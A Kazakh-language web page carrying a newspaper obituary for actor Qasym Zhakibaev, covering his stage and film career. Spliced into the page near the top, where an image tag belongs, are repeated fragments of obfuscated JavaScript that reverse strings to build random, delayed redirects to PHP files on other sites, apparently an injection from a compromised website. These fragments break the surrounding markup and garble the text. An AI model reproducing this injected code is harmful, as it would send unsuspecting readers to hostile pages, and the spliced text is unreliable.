Қара шал — қазақ өнеріндегі қайталанбас құбылыс еді…

1-bet-Kasym-Zhakibaev$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/1-bet-Kasym-Zhakibaev.jpg» width=»128″ height=»177″ />Бар ғұмырын қазақтың театр және кино өміріне сарп еткен Қазақстанның Халық артисі, театр және кино актері, «Парасат» орденінің иегері Қасым Жәкібаев 82 жасқа қараған шағында дүниеден озды.


Театр сахнасында сонау соғыстан кейінгі жылдардан бастап есептегенде 200-ге тарта рөлдерде ойнаған Қасым ағамыз кино саласында да бір кісідей тер төккен жан болатын. Көрерменге «Дерсу Узала», «Сұрапыл Сұржекей», «Шоқ пен Шер», «Қан мен тер», «Отырар», «Жансебіл», «Махаббат стансасы», «Тоғысқан тағдырлар» көркем фильмдері арқылы кеңінен танылды. Құйтақандай дене бітіміне, дауыс тембріне байланысты еңбектеген баладан еңкейген қартқа дейін сомдады. Жастық шағы соғыстың сұрапыл жылдарына тап келіп, қиыншылықты көп көрген ол, сол қиын заманда көркем сурет училищесін бітіріп, «артист» деген мамандық алып, осыдан 63 жыл бұрын театр табалдырығын аттаған екен. Бар ғұмыры сол театрда өтті. Осынау қайталанбас тұлға 80 жылдық мерейтойын денсаулығына байланысты өткізе алмап еді. Үш рет алған инфаркттан үйінде біраз жыл төсек тартып жатты. «Айқын» газетіне берген бір сұхбатында түсінде де театрға барып жүретінін айтып еді марқұм.
Қош бол, қазақтың қайталанбас Қасымы! Топырағыңыз торқа болсын!

«Айқын» газеті{jcomments on}

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика